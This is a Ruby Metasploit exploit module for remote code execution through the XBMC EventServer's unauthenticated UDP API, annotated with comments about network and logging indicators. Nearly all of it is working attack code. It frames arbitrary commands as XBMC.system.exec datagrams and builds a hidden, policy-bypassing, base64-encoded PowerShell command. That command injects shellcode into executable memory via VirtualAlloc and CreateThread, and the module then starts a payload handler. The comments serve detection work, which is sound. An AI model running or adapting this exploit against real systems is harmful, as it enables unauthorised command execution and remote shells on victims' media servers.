XBMC EventServer API Metasploit Module
require 'msf/core'
# Metasploit module driving the XBMC EventServer (UDP, default port 9777).
#
# From a defender's point of view the useful part is the wire format this
# file reproduces: every datagram starts with the ASCII magic "XBMC", a
# 2.0 version field and a fixed 32-byte header, and the action payload is a
# plain-text XBMC builtin call. Those constants are straightforward network
# detection indicators for unauthenticated EventServer use, and the HELO
# packet below announces the literal client name "msf".
class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Udp

  # Module metadata. Four targets are declared: two PowerShell-based x86
  # shellcode runners (differing only in the PowerShell path, SysWOW64 vs
  # System32) and two plain command targets (Windows / Unix).
  # Only RPORT is registered here; the 'CMD' datastore key read in #exploit
  # is not declared as an option in this block.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'XBMC Remote UDP Code Exec',
      # %q body kept at column 0: its leading whitespace is part of the string.
      'Description' => %q{
This module uses the XBMC remote API to run a command on the target server. For
Windows 7 and Windows 8, it can also be used to launch a Powershell-based direct
shellcode injection exploit.
Tested on XBMC 12.3 (Frodo).
},
      'Author' =>
        [ 'Phikshun' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: 14774 $',
      'References' =>
        [ [ 'URL', 'http://disconnected.io/2014/02/20/its-a-feature/' ], ],
      'DefaultOptions' => { },
      'Platform' => %w{ win unix },
      'Targets' =>
        [
          [ 'Windows 7/8 x64', {
            'Arch' => ARCH_X86,
            'Platform' => 'win',
            'Powershell' => "c:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"
          } ],
          [ 'Windows 7/8 x86', {
            'Arch' => ARCH_X86,
            'Platform' => 'win',
            'Powershell' => "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe"
          } ],
          [ 'Windows CMD', {
            'Arch' => ARCH_CMD,
            'Platform' => 'win'
          } ],
          [ 'Unix CMD', {
            'Arch' => ARCH_CMD,
            'Platform' => 'unix'
          } ]
        ],
      'Privileged' => false,
      'DefaultTarget' => 0,
      # NOTE(review): not a calendar date; Metasploit normally expects a
      # parsable date in this field — confirm intent.
      'DisclosureDate' => 'It\'s a feature' ))
    register_options([Opt::RPORT(9777)], self.class)
  end

  # Entry point. Sends either the CMD datastore value or (when CMD is unset)
  # a PowerShell one-liner carrying the shellcode runner from
  # #generate_powershell, framed as EventServer datagrams by
  # #build_xbmc_remote_messages. Then starts the payload handler, closes the
  # socket and waits about five seconds before returning.
  def exploit
    connect_udp
    if datastore['CMD']
      print_status("Executing command #{datastore['CMD']}")
      command = datastore['CMD']
    else
      # PowerShell is launched hidden, without profile, with the execution
      # policy bypassed; the script is passed as -encodedCommand, i.e.
      # base64 of the UTF-16LE text produced by Rex::Text.to_unicode.
      print_status("Encoding shellcode with Powershell")
      command = "#{target['Powershell']} -w hidden -nop -ep bypass -noexit -encodedCommand " +
        Rex::Text.encode_base64(Rex::Text.to_unicode(generate_powershell))
    end
    print_status("Sending exploit")
    # Each element is one complete datagram: HELO, the action chunk(s), BYE.
    build_xbmc_remote_messages(command).each do |pkt|
      udp_sock.put(pkt)
      print_status("Wrote UDP packet of length #{pkt.length}")
    end
    handler
    disconnect_udp
    # select() with only a timeout acts as a 1-second sleep; done five times.
    5.times { select(nil, nil, nil, 1) }
  end

  # Frames +cmd+ as an EventServer action request.
  #
  # The payload is a 0x01 byte followed by the NUL-terminated builtin call
  # XBMC.system.exec(<cmd>). It is split into chunks of at most 992 bytes
  # (32-byte header + 992 = 1024 bytes per datagram). The first chunk uses
  # packet type 10, continuation chunks type 8 (these look like PT_ACTION and
  # PT_BLOB in XBMC's client header — confirm against xbmcclient.h). Every
  # header carries the 1-based chunk index and the same total count.
  #
  # @param cmd [String] command text inserted verbatim into the builtin call
  # @return [Array<String>] [hello, chunk..., bye] as raw datagram strings
  def build_xbmc_remote_messages(cmd)
    cmd = "\x01XBMC.system.exec(#{cmd})\x00"
    messages = []
    messages << hello_message
    # Integer division; this value is stamped as the max-sequence field of
    # every chunk header.
    count = (cmd.length / 992) + 1
    # /m lets '.' match newlines so a multi-line command still chunks.
    cmd.scan(/.{1,992}/m).each_with_index do |c,i|
      messages << message_header((i > 0 ? 8 : 10), i+1, count, c.length) + c
    end
    messages << bye_message
    messages
  end

  # Static HELO datagram (packet type 1): "XBMC" magic, version 2.0, seq 1
  # of 1, payload length 0x0f, token \x52\xea\xc6\x7f, 10 reserved bytes,
  # then the 15-byte payload starting with the client name "msf" followed
  # by a NUL and zero padding. The "msf" device name is a cheap indicator of
  # this module in EventServer logs or captures.
  def hello_message
    "\x58\x42\x4d\x43\x02\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00" +
    "\x0f\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6d\x73" +
    "\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  end

  # Static BYE datagram (packet type 2): same header layout as HELO with a
  # zero-length payload, so it is exactly the 32-byte header.
  def bye_message
    "\x58\x42\x4d\x43\x02\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00" +
    "\x00\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  end

  # Builds the fixed 32-byte EventServer header:
  #   "XBMC" magic (4) | version 2.0 (2) | type (2) | seq (4) | count (4)
  #   | payload size (2) | token \x52\xea\xc6\x7f (4) | 10 reserved zero bytes
  # Multi-byte numeric fields are big-endian (pack 'n' / 'N'). The token is
  # hard-coded rather than random, which makes it another fixed indicator.
  #
  # @param type [Integer] packet type, 16-bit
  # @param seq [Integer] 1-based chunk index, 32-bit
  # @param count [Integer] total chunk count, 32-bit
  # @param size [Integer] payload length of this chunk, 16-bit
  # @return [String] 32-byte binary header
  def message_header(type, seq, count, size)
    header = "\x58\x42\x4d\x43\x02\x00"
    header += [type].pack('n')
    header += [seq].pack('N')
    header += [count].pack('N')
    header += [size].pack('n')
    header += "\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    header
  end

  # Returns the PowerShell script run by the non-CMD targets.
  #
  # It declares VirtualAlloc / CreateThread / memset through Add-Type
  # P/Invoke, embeds payload.encoded as a comma-separated "0x.." byte array
  # (Rex::Text.to_hex output with "\x" rewritten to ",0" and the leading
  # comma dropped), copies it one byte at a time with memset into an
  # allocation requested with protection 0x40 (PAGE_EXECUTE_READWRITE) and
  # starts a thread at its base. This Add-Type + VirtualAlloc(0x40) +
  # CreateThread pattern is a widely used detection signature for
  # PowerShell loaders; script block logging would expose the decoded text.
  #
  # The script is one multi-line double-quoted literal, so its lines are
  # kept at column 0: any leading whitespace would become part of the
  # script. The assignment is the method's last expression and is the
  # return value.
  def generate_powershell
    powershell = "$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"
  end
end